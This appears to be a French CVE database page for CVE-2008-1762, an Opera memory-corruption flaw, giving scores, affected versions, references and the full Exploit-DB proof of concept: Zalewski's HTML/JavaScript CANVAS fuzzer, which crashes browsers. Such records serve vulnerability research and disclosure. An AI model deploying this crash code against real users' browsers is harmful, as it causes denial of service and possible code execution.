CVE-2008-1762 : Détail

CVE-2008-1762

11.9%V3
Network
2008-04-12
18h00 +00:00
2017-08-07
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Opera before 9.27 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted scaled image pattern in an HTML CANVAS element, which triggers memory corruption.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 31594

Date de publication : 2008-04-02 22h00 +00:00
Auteur : Michal Zalewski
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/28585/info Opera Web Browser is prone to multiple security vulnerabilities that may allow remote attackers to execute code. These issues lead to memory corruption and may result in remote unauthorized access and denial-of-service attacks. Versions prior to Opera 9.27 are vulnerable. <body> <font face="arial,helvetica"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href="mailto:lcamtuf@coredump.cx">lcamtuf@coredump.cx</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style="border: 1px solid teal"></canvas> </div> <img id=image src="envelope.gif" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value="Begin tests" id=button onclick="setup_all()"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return "#C0F0A0"; else return "#000090"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,"repeat"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script>

Products Mentioned

Configuraton 0

Opera>>Opera_browser >> Version To (including) 9.26

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.02

Opera>>Opera_browser >> Version 5.10

Opera>>Opera_browser >> Version 5.11

Opera>>Opera_browser >> Version 5.12

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.1

Opera>>Opera_browser >> Version 6.01

Opera>>Opera_browser >> Version 6.1

Opera>>Opera_browser >> Version 6.02

Opera>>Opera_browser >> Version 6.03

Opera>>Opera_browser >> Version 6.04

Opera>>Opera_browser >> Version 6.05

Opera>>Opera_browser >> Version 6.06

Opera>>Opera_browser >> Version 6.11

Opera>>Opera_browser >> Version 6.12

Opera>>Opera_browser >> Version 7.0

Opera>>Opera_browser >> Version 7.0

Opera>>Opera_browser >> Version 7.0

Opera>>Opera_browser >> Version 7.0

Opera>>Opera_browser >> Version 7.01

Opera>>Opera_browser >> Version 7.02

Opera>>Opera_browser >> Version 7.03

Opera>>Opera_browser >> Version 7.10

Opera>>Opera_browser >> Version 7.10

Opera>>Opera_browser >> Version 7.11

Opera>>Opera_browser >> Version 7.11

Opera>>Opera_browser >> Version 7.20

Opera>>Opera_browser >> Version 7.20

Opera>>Opera_browser >> Version 7.21

Opera>>Opera_browser >> Version 7.22

Opera>>Opera_browser >> Version 7.23

Opera>>Opera_browser >> Version 7.50

Opera>>Opera_browser >> Version 7.50

Opera>>Opera_browser >> Version 7.51

Opera>>Opera_browser >> Version 7.52

Opera>>Opera_browser >> Version 7.53

Opera>>Opera_browser >> Version 7.54

Opera>>Opera_browser >> Version 7.54

Opera>>Opera_browser >> Version 7.54

Opera>>Opera_browser >> Version 7.60

Opera>>Opera_browser >> Version 8.0

Opera>>Opera_browser >> Version 8.0

Opera>>Opera_browser >> Version 8.0

Opera>>Opera_browser >> Version 8.0

Opera>>Opera_browser >> Version 8.01

Opera>>Opera_browser >> Version 8.02

Opera>>Opera_browser >> Version 8.50

Opera>>Opera_browser >> Version 8.51

Opera>>Opera_browser >> Version 8.52

Opera>>Opera_browser >> Version 8.53

Opera>>Opera_browser >> Version 8.54

Opera>>Opera_browser >> Version 9.0

Opera>>Opera_browser >> Version 9.0

Opera>>Opera_browser >> Version 9.0

Opera>>Opera_browser >> Version 9.01

Opera>>Opera_browser >> Version 9.02

Opera>>Opera_browser >> Version 9.10

Opera>>Opera_browser >> Version 9.12

Opera>>Opera_browser >> Version 9.20

Opera>>Opera_browser >> Version 9.20

Opera>>Opera_browser >> Version 9.21

Opera>>Opera_browser >> Version 9.22

Opera>>Opera_browser >> Version 9.23

Opera>>Opera_browser >> Version 9.24

Opera>>Opera_browser >> Version 9.25

Références

http://www.securityfocus.com/bid/28585
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/29679
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29735
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29662
Tags : third-party-advisory, x_refsource_SECUNIA
http://security.gentoo.org/glsa/glsa-200804-14.xml
Tags : vendor-advisory, x_refsource_GENTOO